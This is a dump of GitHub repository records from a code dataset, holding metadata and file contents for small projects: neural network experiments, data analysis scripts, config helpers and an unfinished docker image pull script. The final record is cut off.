repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
crook/LuoYunCloud
|
https://github.com/crook/LuoYunCloud
|
1ccb51ab0bbebad4983af37ce17b290f2b00dd6a
|
a55380abaf3436632cb71dbf71832b231b0c4dba
|
663e78a659f5468b493ca6e5f62b34e81615322e
|
refs/heads/master
| 2021-01-15T23:35:09.097300 | 2013-08-17T05:29:44 | 2013-08-17T05:29:44 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6271777153015137,
"alphanum_fraction": 0.6289198398590088,
"avg_line_length": 17.19354820251465,
"blob_id": "dcebc5bab3b3a58573bc7fb7bfde7276a0fa3acc",
"content_id": "780796c7114ae5dc6ff74686e7aef865d5984329",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 574,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 31,
"path": "/lyweb/app/site/utils.py",
"repo_name": "crook/LuoYunCloud",
"src_encoding": "UTF-8",
"text": "from .models import SiteConfig\n\nfrom yweb import orm\nfrom settings import runtime_data\n\n\ndef get_site_config(key, default_value=None):\n\n dbsession = runtime_data.get('dbsession')\n if not dbsession:\n dbsession = orm.create_session()\n runtime_data['dbsession'] = dbsession\n\n db = dbsession()\n v = SiteConfig.get(db, key, default_value)\n\n dbsession.remove()\n\n return v\n\n\ndef get_site_config_int(key, default_value=None):\n\n v = get_site_config(key, default_value)\n\n try:\n v = int(v)\n except:\n v = 0\n\n return v\n\n \n"
},
{
"alpha_fraction": 0.5478522777557373,
"alphanum_fraction": 0.5493594408035278,
"avg_line_length": 21.116666793823242,
"blob_id": "1d783a9353c5b414cba648726d807e91b446ac8c",
"content_id": "afa6615f63e19184a5334b1267be147eccada212",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1327,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 60,
"path": "/lyweb/lib/ytool/ini.py",
"repo_name": "crook/LuoYunCloud",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport ConfigParser\n\nclass ConfigINI:\n\n def __init__(self, config, catalog=None):\n self.config = config\n self._load()\n self.catalog = catalog\n\n\n def _load(self):\n self.cf = ConfigParser.ConfigParser()\n self.cf.read( self.config )\n\n\n def set_catalog(self, catalog):\n self.catalog = catalog\n\n\n def get(self, key, default=None, catalog=None):\n\n if not catalog:\n if self.catalog:\n catalog = self.catalog\n else:\n return False\n\n if self.cf.has_option(catalog, key):\n return self.cf.get(catalog, key)\n else:\n return default\n\n\n def get2(self, key, default=None, catalog=None):\n self._load()\n return self.get(catalog, key, default)\n\n\n def set(self, key, value, catalog=None):\n\n if not catalog:\n if self.catalog:\n catalog = self.catalog\n else:\n return False\n\n if not self.cf.has_section( catalog ):\n self.cf.add_section( catalog )\n return self.cf.set(catalog, key, value)\n\n\n def set2(self, key, value, catalog=None):\n self._load()\n return self.cf.set(key, value, catalog)\n\n\n def save(self):\n self.cf.write( open( self.config, 'w' ) )\n"
},
{
"alpha_fraction": 0.38063064217567444,
"alphanum_fraction": 0.4054054021835327,
"avg_line_length": 21.421052932739258,
"blob_id": "af4fa55a1ade2280b45744eed86e0105e1d19881",
"content_id": "3841613b753f7fcf37f2a0a2f7b9dfa80532d990",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 19,
"path": "/lyweb/lib/ytool/params.py",
"repo_name": "crook/LuoYunCloud",
"src_encoding": "UTF-8",
"text": "def str2intlist(string, spliter=','):\n ''' String to integer list\n\n Input: '1, 2, 3, 4, 5, a, b, c, ...'\n Output: ([1, 2, 3, 4, 5, ...], ['a', 'b', 'c', ...])\n '''\n\n if not string: string = ''\n\n OK, FAIL = [], []\n L = [ x.strip() for x in string.split(spliter) ]\n for x in L:\n try:\n x = int(x)\n OK.append(x)\n except:\n FAIL.append(x)\n\n return OK, FAIL\n \n \n"
}
] | 3 |
jeannekamikaze/ann
|
https://github.com/jeannekamikaze/ann
|
ea258fdcece54bfd8d02263b89c33162089d0619
|
f49b3cd9b1810f711331d43d2b0245bd16578b8f
|
4d2c0effcd90da721a45aa42233c896fb14be760
|
refs/heads/master
| 2021-01-18T22:15:24.559181 | 2020-10-12T17:00:57 | 2020-10-12T17:00:57 | 87,038,618 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8518518805503845,
"alphanum_fraction": 0.8518518805503845,
"avg_line_length": 26,
"blob_id": "6033589bdb44bf84ba96b5a5915f6d7c4dbf1831",
"content_id": "53c9de79e994d28382e4cf3f444319bfdfc4d8da",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 54,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 2,
"path": "/README.md",
"repo_name": "jeannekamikaze/ann",
"src_encoding": "UTF-8",
"text": "# ann\nArtificial neural networks learning experiments\n"
},
{
"alpha_fraction": 0.5495662689208984,
"alphanum_fraction": 0.578066885471344,
"avg_line_length": 28.88888931274414,
"blob_id": "3593bb7a0f63fe39f5b804705ee34f761fcb264b",
"content_id": "3193b21b9bb1ee493790a01ddbe3c4b567aa00a1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1614,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 54,
"path": "/multi-perceptron.cc",
"repo_name": "jeannekamikaze/ann",
"src_encoding": "UTF-8",
"text": "// This is an implementation for the multiple-neuron perceptron example\n// in chapter 4 of the Neural Network Design book by Martin Hagan.\n\n#include <eigen3/Eigen/Dense>\n#include <vector>\n#include <iostream>\n\nusing namespace Eigen;\n\ndouble hardlim (double x)\n{\n return x >= 0 ? 1 : 0;\n}\n\ndouble feedforward (const MatrixXd& W, const VectorXd& p)\n{\n return hardlim((W*p)[0]);\n}\n\nint main ()\n{\n // Set initial values for the weight matrix.\n double bias = 0.5;\n MatrixXd W(1,4); W << 0.5, -1.0, -0.5, bias;\n\n // Example input/output pairs.\n // Extended with a last value of 1 that multiplies the bias.\n VectorXd p1(4); p1 << 1, -1, -1, 1;\n VectorXd p2(4); p2 << 1, +1, -1, 1;\n std::vector<VectorXd> inputs { p1, p2 };\n std::vector<double> targets { 0, 1 };\n\n // Train the network.\n // It is kind of dumb to iterate many times here because we know\n // the network converges in 3 steps for this particular problem,\n // but this is what you would do in the general case.\n for (int i = 0; i < 100; ++i)\n {\n for (std::size_t i = 0; i < inputs.size(); ++i)\n {\n const VectorXd& p = inputs[i];\n double t = targets[i];\n double o = feedforward(W,p); // network output\n double e = t-o; // error\n W = W + (e*p).transpose(); // update weights using perceptron learning rule\n }\n }\n\n std::cout << \"Weight matrix: \" << W << std::endl;\n std::cout << p1.transpose() << \" -> \" << feedforward(W,p1) << std::endl;\n std::cout << p2.transpose() << \" -> \" << feedforward(W,p2) << std::endl;\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6117318272590637,
"alphanum_fraction": 0.647185206413269,
"avg_line_length": 30.445945739746094,
"blob_id": "6e3284eb2da3480ade507485bd805d953b3dc54a",
"content_id": "c7e9bde9c1502118bf89b7006b610f1283a266bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4654,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 148,
"path": "/cifar.py",
"repo_name": "jeannekamikaze/ann",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#\n# Chapter 2 of \"Generative Deep Learning: Teaching Machines to Paint, Write,\n# Compose, and Play\".\n\n# Get Tensorflow to shut up.\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport argparse\nfrom keras.datasets import cifar10\nfrom keras.layers import BatchNormalization, Conv2D, Dense, Dropout, Flatten, Input, LeakyReLU\nfrom keras.models import Model, Sequential\nfrom keras.optimizers import Adam\nfrom keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nNUM_CLASSES = 10\n\n\ndef normalize(pixels: np.array):\n \"\"\"Map the given pixels array from integers in the range 0..255 to float32s\n in the range 0..1.\"\"\"\n return pixels.astype('float32') / 255.0\n\n\ndef build_model(tag: str) -> Model:\n \"\"\"Build a model for prediction.\n\n Args:\n tag: Either 'dense' or 'convolutional'.\n \"\"\"\n if tag == \"dense\":\n model = Sequential([\n Flatten(input_shape=(32, 32, 3)),\n Dense(200, activation='relu'),\n Dense(150, activation='relu'),\n Dense(NUM_CLASSES, activation='softmax')\n ])\n # The same model built using the Functional API.\n # input_layer = Input(shape=(32, 32, 3))\n # x = Flatten()(input_layer)\n # x = Dense(units=200, activation = 'relu')(x)\n # x = Dense(units=150, activation = 'relu')(x)\n # output_layer = Dense(units=10, activation = 'softmax')(x)\n # model = Model(input_layer, output_layer)\n elif tag == \"convolutional\":\n model = Sequential([\n Input(shape=(32,32,3)),\n Conv2D(filters=32, kernel_size=3, strides=1, padding='same'),\n BatchNormalization(),\n LeakyReLU(),\n Conv2D(filters=32, kernel_size=3, strides=2, padding='same'),\n BatchNormalization(),\n LeakyReLU(),\n Conv2D(filters=64, kernel_size=3, strides=1, padding='same'),\n BatchNormalization(),\n LeakyReLU(),\n Conv2D(filters=64, kernel_size=3, strides=2, padding='same'),\n BatchNormalization(),\n LeakyReLU(),\n Flatten(),\n Dense(128),\n BatchNormalization(),\n LeakyReLU(),\n Dropout(rate=0.5),\n Dense(NUM_CLASSES, activation='softmax')\n ])\n else:\n raise ValueError(\"tag must be 'dense' or 'convolutional'\")\n model.build()\n return model\n\n\ndef train_model(model: Model, x_train: np.array, y_train: np.array):\n \"\"\"Train the model.\"\"\"\n optimizer = Adam(lr=0.0005)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer,\n metrics=['accuracy'])\n model.fit(x_train, y_train, batch_size = 12, epochs = 10, shuffle = True)\n\n\ndef plot_results(model: Model, x_test, y_test):\n \"\"\"Plot a random subset of predictions on the test data.\"\"\"\n\n def prob_to_class(probabilities: np.array):\n \"\"\"Run predictions on a set of images.\"\"\"\n assert probabilities.shape[1] == 10 # Should have 10 probabilities.\n CLASSES = np.array(['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog',\n 'frog', 'horse', 'ship', 'truck'])\n predictions = CLASSES[np.argmax(probabilities, axis=-1)]\n return predictions\n\n predicted = prob_to_class(model.predict(x_test))\n actual = prob_to_class(y_test)\n\n total_images = 10 # Number of images to show.\n image_indices = np.random.choice(range(len(x_test)), total_images)\n\n fig = plt.figure(figsize=(15, 3))\n fig.subplots_adjust(hspace=0.4, wspace=0.4)\n\n for i, image_index in enumerate(image_indices):\n img = x_test[image_index]\n ax = fig.add_subplot(1, total_images, i+1)\n ax.axis('off')\n ax.text(0.5, -0.35, 'pred = ' + str(predicted[image_index]), fontsize=10,\n ha='center', transform=ax.transAxes)\n ax.text(0.5, -0.7, 'act = ' + str(actual[image_index]), fontsize=10,\n ha='center', transform=ax.transAxes)\n ax.imshow(img)\n\n plt.show()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"arch\", type=str, choices=[\"dense\", \"convolutional\"])\n args = parser.parse_args()\n\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n print(\"x_train:\", x_train.shape) # (50000, 32, 32, 3)\n print(\"y_train:\", y_train.shape) # (50000, 1)\n print(\"x_test:\", x_test.shape) # (10000, 32, 32, 3)\n print(\"y_test:\", y_test.shape) # (10000, 1)\n\n # Normalize for better performance in training.\n x_train = normalize(x_train)\n x_test = normalize(x_test)\n\n # Create one-hot encodings of the class labels 0..9.\n y_train = to_categorical(y_train, NUM_CLASSES) # shape = (50000, 10)\n y_test = to_categorical(y_test, NUM_CLASSES) # shape = (10000, 10)\n\n model = build_model(args.arch)\n print(model.summary())\n\n train_model(model, x_train, y_train)\n\n model.evaluate(x_test, y_test)\n\n plot_results(model, x_test, y_test)\n\n\nmain()\n"
},
{
"alpha_fraction": 0.5382103323936462,
"alphanum_fraction": 0.5574787855148315,
"avg_line_length": 24.098360061645508,
"blob_id": "adbf88537cba91769d496e083efa7b826288f328",
"content_id": "385cc0089da8b638daedcde6715cb1489c489058",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3062,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 122,
"path": "/perceptron.cc",
"repo_name": "jeannekamikaze/ann",
"src_encoding": "UTF-8",
"text": "#include <vector>\n#include <functional>\n#include <random>\n#include <iostream>\n\nstd::ostream& operator<< (std::ostream& os, const std::vector<double>& vector)\n{\n if (vector.size() == 0)\n {\n os << \"[]\";\n }\n else\n {\n os << \"[\";\n for (std::size_t i = 0; i < vector.size()-1; ++i)\n os << vector[i] << \", \";\n os << vector[vector.size()-1];\n os << \"]\";\n }\n return os;\n}\n\nusing RandGen = std::mt19937;\nusing Activation_Function = std::function<double(double)>;\n\n/// Evaluate the perceptron.\ndouble feedforward (\n const std::vector<double>& input,\n const std::vector<double>& weight,\n const Activation_Function& activate)\n{\n double sum = 0.0;\n for (std::size_t i = 0; i < input.size(); ++i) {\n sum += input[i] * weight[i];\n }\n return activate(sum);\n}\n\n/// Binary activation function.\ndouble activate (double out)\n{\n return out >= 0.0 ? 1.0 : -1.0;\n}\n\n/// Adjust the perceptron's weights.\nvoid adjust_weights (\n double c, // learning rate\n double error,\n const std::vector<double>& input,\n std::vector<double>& weight)\n{\n for (std::size_t i = 0; i < weight.size(); ++i)\n {\n weight[i] = weight[i] + c * error * input[i];\n }\n}\n\n/// Train a perceptron so that it is able to separate points above and below\n/// the y = x line.\nvoid train_yx (RandGen& gen, std::vector<double>& weight)\n{\n std::uniform_real_distribution<double> rand(-10, 10);\n const int max_iterations = 10000;\n double c = 0.1; // learning rate\n\n std::vector<double> input(3);\n input[2] = 1; // bias is always 1\n\n for (int i = 0; i < max_iterations; ++i)\n {\n // Generate an input with a known solution.\n input[0] = rand(gen); // x\n input[1] = rand(gen); // y\n double sol = input[1] >= input[0] ? 1.0 : -1.0; // +1 above the line, -1 below\n\n // Adjust the perceptron's weights.\n double out = feedforward(input, weight, activate);\n double error = sol - out;\n adjust_weights(c, error, input, weight);\n\n // Adjust learning rate to help convergence\n c = 0.999 * c;\n\n std::cout << \"W: \" << weight << \", E: \" << error << \", C: \" << c << std::endl;\n }\n}\n\n/// Return a vector of size 'n' with values uniformly distributed in [a,b).\ntemplate <typename RandGen>\nstd::vector<double> random_vector (RandGen& gen, std::size_t n, double a, double b)\n{\n std::vector<double> vector(n);\n std::uniform_real_distribution<double> rand(a,b);\n for (double& x : vector)\n {\n x = rand(gen);\n }\n return vector;\n}\n\nint main ()\n{\n std::random_device rd;\n RandGen gen(rd());\n\n std::vector<double> weight = random_vector(gen, 3, -1, 1);\n train_yx(gen, weight);\n\n std::vector<std::vector<double>> inputs = {\n // last value is the bias\n { 2, 5, 1 },\n { 3, 1, 1 }\n };\n\n for (auto input : inputs)\n {\n double output = feedforward(input, weight, activate);\n std::cout << input << \" -> \" << output << std::endl;\n }\n\n return 0;\n}\n"
}
] | 4 |
NelluriRam/diabetic-occurence-predictor
|
https://github.com/NelluriRam/diabetic-occurence-predictor
|
c303d86b69c583a7b9c9df6d26c740d5bc441dbd
|
0f2a877ac797efa6d5cd52da6b65e3ba0c609a56
|
88432f98675b0d61b99509bd2b2c5fb688a86bc4
|
refs/heads/master
| 2023-01-04T21:07:01.472173 | 2020-10-14T06:29:14 | 2020-10-14T06:29:14 | 303,694,160 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.73591548204422,
"alphanum_fraction": 0.7453051805496216,
"avg_line_length": 34.54166793823242,
"blob_id": "f124c999412c7991e04339f7468e3d1bb5586526",
"content_id": "d2d2f2489b9fb5c0ddf6ea8c96bb93b558f0745f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 852,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 24,
"path": "/main.py",
"repo_name": "NelluriRam/diabetic-occurence-predictor",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport pickle\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\n\ndata = pd.read_csv('diabetes2.csv')\ndf = pd.DataFrame(data)\n#print(df)\ndf['Outcome'].value_counts()\narray = data.values\nX = array[:,0:4]\ny = array[:,4]\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.3,random_state=21)\nreg=LogisticRegression()\nreg.fit(X_train,y_train)\ny_log_pred = reg.predict(X_test)\ny_log = reg.predict(X_train)\nprint('Accuracy Score of your model in training is : ',metrics.accuracy_score(y_train,y_log))\nprint('Accuracy Score of your model is : ',metrics.accuracy_score(y_test,y_log_pred))\nroc_auc_score(y_test,y_log_pred)\npickle.dump(reg,open('model.pkl','wb'))\nmodel=pickle.load(open('model.pkl','rb'))"
}
] | 1 |
gldnpz17/RekdatAssignmentLO5
|
https://github.com/gldnpz17/RekdatAssignmentLO5
|
289afd7b03077cfab47ce76a457843869c94b3de
|
130b331a1e106a202207dc343ca48102c071e1b2
|
ae747e9d503cc99fdfb781dc5d3e751c725d8074
|
refs/heads/master
| 2023-07-26T11:09:02.397344 | 2021-09-10T00:23:32 | 2021-09-10T00:23:32 | 404,907,782 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6511884927749634,
"alphanum_fraction": 0.6539524793624878,
"avg_line_length": 19.55681800842285,
"blob_id": "3f4df42a5487ecaa116db210bf80f6b97e042083",
"content_id": "733b9172040d963f0575d101bbae15905a79142a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1809,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 88,
"path": "/FoodData.py",
"repo_name": "gldnpz17/RekdatAssignmentLO5",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plt\n\nraw_data = pd.read_csv('menu.csv')\nmenu_data = raw_data[['Category', 'Serving Size', 'Calories']]\n\n# Parse numerical data.\nfor index, row in menu_data.iterrows():\n weight = (re.search('\\\\((\\\\d+) g\\\\)', row['Serving Size']))\n if weight is None:\n menu_data.at[index, 'Serving Size'] = np.nan\n else:\n menu_data.at[index, 'Serving Size'] = float(weight.group(1))\n\nmenu_data.dropna(inplace=True)\n\nprint(menu_data)\n\n# Calculate calorie density.\nmenu_data['Calorie Density'] = menu_data['Calories']/menu_data['Serving Size']\n\n# Serving size boxplot.\naxes = sns.boxplot(\n data=menu_data,\n x='Category',\n y='Serving Size',\n).set(\n xlabel='Kategori',\n ylabel='Takaran sajian (gram)',\n title='Boxplot Takaran Sajian Makanan'\n)\nplt.show()\n\n# Calorie boxplot.\naxes = sns.boxplot(\n data=menu_data,\n x='Category',\n y='Calories',\n).set(\n xlabel='Kategori',\n ylabel='Kalori (kalori)',\n title='Boxplot Kalori Makanan'\n)\nplt.show()\n\n# Calorie density boxplot\naxes = sns.boxplot(\n data=menu_data,\n x='Category',\n y='Calorie Density'\n).set(\n xlabel='Kategori',\n ylabel='Densitas Kalori (kalori/gram)',\n title='Boxplot Densitas Kalori Makanan'\n)\nplt.show()\n\n# Calorie density histogram.\ngrid = sns.FacetGrid(\n menu_data,\n col='Category',\n height=2,\n col_wrap=3\n)\ngrid.map(sns.histplot, 'Calorie Density')\nplt.show()\n\n# Menu scatterplot combined.\nsns.scatterplot(\n data=menu_data,\n x='Serving Size',\n y='Calories',\n hue='Category'\n)\nplt.show()\n\n# Menu scatterplot separate.\ngrid = sns.FacetGrid(\n menu_data,\n col='Category',\n height=2,\n col_wrap=3\n)\ngrid.map(sns.scatterplot, 'Serving Size', 'Calories')\nplt.show()\n"
}
] | 1 |
perrenwright/deeplearning
|
https://github.com/perrenwright/deeplearning
|
ce47cd644dc91b29f04f9cd1c7720fbd348dad58
|
01675d8cb348633a3f3dd4e534d8d3dc3fd0b47d
|
375b27eaffbf52f4e185360dc509cd36d85b8f9d
|
refs/heads/master
| 2020-04-28T13:36:35.777088 | 2019-08-26T23:27:38 | 2019-08-26T23:27:38 | 175,311,058 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7258829474449158,
"alphanum_fraction": 0.73695307970047,
"avg_line_length": 39.36170196533203,
"blob_id": "8ddd95a7216773bdc2da9f607cab44122ecd5ed8",
"content_id": "98f2fc84a1beaeab1d42d65f2e567081317c6ee8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1897,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 47,
"path": "/deeplearning.py",
"repo_name": "perrenwright/deeplearning",
"src_encoding": "UTF-8",
"text": "#Deep Learning\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as pyplot\nimport scipy\nfrom sklearn.metrics import accuracy_score \nfrom sklearn.metrics import classification_report \nfrom sklearn.metrics import f1_score\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\n#Reading in the data\nprint(\"Breast Cancer Wisconsin (Diagnostic) Data Set\")\n\n#datasets from the website \nurl = \"https://archive.ics.uci.edu/ml/machine-learning-databases/breast-cancer-wisconsin/wdbc.data\"\n\n\n#32 attributes\nattributes = [\"ID\", \"Diagnosis\", \"mean radius\", \"mean texture\", \"mean perimeter\", \"mean area\", \"mean smoothness\", \"mean compactness\", \"mean concavity\", \"mean concave points\", \"mean symmetry\", \"mean fractal dimension\", \n\"radius se\", \"texture se\", \"perimeter se\", \"area se\", \"smoothness se\", \"compactness se\", \"concavity se\", \"concave points se\", \"symmetry se\", \"fractal dimension se\", \n\"radius worst\", \"texture worst\", \"perimeter worst\", \"area worst\", \"smoothness worst\", \"compactness worst\", \"concavity worst\", \"concave points worst\", \"symmetry worst\", \"fractal dimesion worst\"]\n\ndf = pd.read_csv(url, names = attributes)\ndf.dropna(0, how ='any')\narray = df.values \n\nX = array[:569, 2:32]\nY_char = np.array(array[:569, 1])\nychar, y = np.unique(Y_char, return_inverse= True)\n\n#transformed to fit the mean value of a column\nimputer = Imputer()\nX_transf = imputer.fit_transform(X)\n\n#Splitting the dataset\nX_train, X_test, y_train, y_test = train_test_split(X_transf, y, test_size = 0.3)\n\n#Deep Learning Model Fit\nclf = MLPClassifier(solver='lbfgs', alpha = 1e-5, hidden_layer_sizes=(3, 1), random_state=1)\nclf = clf.fit(X_train, y_train)\n\ny_pred = clf.predict(X_test)\nscore = clf.score(X_test, y_test)\nreport = classification_report(y_test, y_pred)\nprint(report)\nprint(\"The score is: \" + str(score))\n"
},
{
"alpha_fraction": 0.8125,
"alphanum_fraction": 0.8125,
"avg_line_length": 55,
"blob_id": "7a583464ac5743002896173e61bd74c40597d713",
"content_id": "9e2dfa8c88a2c5c91ed170118f89a5d0efa65d47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 2,
"path": "/README.md",
"repo_name": "perrenwright/deeplearning",
"src_encoding": "UTF-8",
"text": "# Deep Learning Model\nDescription: This model is a sklearn deep nueral network model on a Breast Cancer Dataset\n"
}
] | 2 |
AssKicker0214/docker_pull
|
https://github.com/AssKicker0214/docker_pull
|
8f647ca9d03d03d60c13486e92f1c7304787a255
|
a890752299af7cf20b3b1123d613c06703b7f08d
|
faecfedb21c6506eaac864a5a2954a6411b4b6aa
|
refs/heads/master
| 2021-01-07T18:56:36.212185 | 2020-02-20T10:34:27 | 2020-02-20T10:34:27 | 241,789,793 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7727272510528564,
"alphanum_fraction": 0.7727272510528564,
"avg_line_length": 21,
"blob_id": "30316384221a92aadbf6164675d5d810ab1378ef",
"content_id": "b2272cbefcbb0ca0a6b7522024ed40ec3439b855",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 44,
"license_type": "permissive",
"max_line_length": 29,
"num_lines": 2,
"path": "/README.md",
"repo_name": "AssKicker0214/docker_pull",
"src_encoding": "UTF-8",
"text": "# docker_pull\nPull docker image as tar ball\n"
},
{
"alpha_fraction": 0.5731059312820435,
"alphanum_fraction": 0.5977075695991516,
"avg_line_length": 35.5,
"blob_id": "766caf02e3e279e59321d091cbba25024e338c45",
"content_id": "ac82ff68fc8e99aa690a8dfee97e7e8be04d4ab1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3577,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 98,
"path": "/docker_pull.py",
"repo_name": "AssKicker0214/docker_pull",
"src_encoding": "UTF-8",
"text": "\"\"\"\n1. python debugger cannot use `172.16.1.245:8080` proxy, but python itself can. use localhost `port2port`\n2. `requests` considers `http` and `https` as two different protocols, when using proxies\n\"\"\"\nimport requests\nimport socket\nimport re\nfrom typing import Tuple\n\n\n# PROXIES = {'https': '172.16.1.245:8080', 'http': '172.16.1.245:8080'}\nPROXIES = {'https': 'localhost:54321', 'http': 'localhost:54321'}\n\ndef parse_name(name):\n components = name.split(\"/\")\n image_name, tag_name, *_ = components.pop().split(\":\") + [\"latest\"]\n\n if len(components) > 0 and ('.' in components[0] or ':' in components[0]):\n registry_name = components[0]\n repository_name = '/'.join(components[1:]) or \"library\"\n else:\n registry_name = \"registry-1.docker.io\"\n repository_name = '/'.join(components) or \"library\"\n\n return registry_name, repository_name, image_name, tag_name\n\n\ndef get_auth_header(registry_name, image_name, repository_name=\"library\", protocol=\"https\"):\n try:\n res = requests.get(\"%s://%s/v2\" % (protocol, registry_name), proxies=PROXIES, verify=False)\n if res.status_code == 200:\n return {} # no need for authentication, thus no auth header.\n if res.status_code == 401: # 401 Unauthorized\n print(\"Authenticating... refer to https://docs.docker.com/registry/spec/auth/token/ \")\n\n \"\"\"\n Bearer realm=\"https://auth.docker.io/token\",service=\"registry.docker.io\"\n \"\"\"\n www_authenticate = res.headers['WWW-Authenticate']\n ptn = re.compile(r'realm=\"(.*)\".*service=\"(.*)\"')\n m = ptn.search(www_authenticate)\n if m:\n auth_url = m.group(1)\n auth_svc = m.group(2)\n auth_res = requests.get(\n \"%s?service=%s&scope=repository:%s/%s:pull\" % (auth_url, auth_svc, repository_name, image_name),\n proxies=PROXIES,\n verify=False\n )\n token = auth_res.json()['token']\n auth_header = {\n 'Authorization': 'Bearer ' + token,\n 'Accept': 'application/vnd.docker.distribution.manifest.v2+json'\n }\n return auth_header\n\n return None\n except requests.exceptions.SSLError as e:\n print(e)\n print(\"Switch to HTTP\")\n return get_auth_header(registry_name, image_name, repository_name=repository_name, protocol=\"http\")\n except Exception as e:\n print(e)\n print(\"Connection failed\")\n return None\n\n\ndef get_image_digest(registry_name, repository_name, image_name, tag_name, auth_header: dict) -> dict:\n assert auth_header is not None\n res = requests.get(\n \n )\n\n\ndef pull(image: str):\n registry_name, repository_name, image_name, tag_name = parse_name(image)\n auth_hdr = get_auth_header(registry_name, image_name, repository_name=repository_name)\n\n if auth_hdr is None:\n print(\"Cannot access to registry: authentication is required but no token can be fetched\")\n retrun False\n\n get_image_digest(registry_name, repository_name, image_name, tag_name, auth_hdr)\n \n\nif __name__ == \"__main__\":\n \"\"\"\n # test\n print(parse_name(\"docker.io/repo/alpine:2\"))\n print(parse_name(\"docker.io/repo/alpine\"))\n print(parse_name(\"docker.io/alpine:3\"))\n print(parse_name(\"repo/alpine:4\"))\n print(parse_name(\"alpine\"))\n \"\"\"\n\n hdr = get_auth_header(\"registry-1.docker.io\", \"alpine\")\n print(hdr)\n # auth(\"172.21.54.98:5000\")\n"
}
] | 2 |
fharookshaik/WHO-Covid-19-Global-reports-download-automation
|
https://github.com/fharookshaik/WHO-Covid-19-Global-reports-download-automation
|
9d085fe27df698534018743f750708a4c16a31e3
|
1faaca29c301170f84f98c5702b552448d908500
|
6e7da1ee17789616c4dee775fef00d22f5fc3de1
|
refs/heads/main
| 2023-06-23T12:51:14.816465 | 2021-07-11T16:41:06 | 2021-07-11T16:41:06 | 377,531,580 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7233009934425354,
"alphanum_fraction": 0.7512136101722717,
"avg_line_length": 32.863014221191406,
"blob_id": "ad75c75b04b3a4f63ea6a8965b26c640d5165360",
"content_id": "d2d69b7ff2b5e9b010b0f0d3ac6b32e1d1c324df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2472,
"license_type": "permissive",
"max_line_length": 249,
"num_lines": 73,
"path": "/README.md",
"repo_name": "fharookshaik/WHO-Covid-19-Global-reports-download-automation",
"src_encoding": "UTF-8",
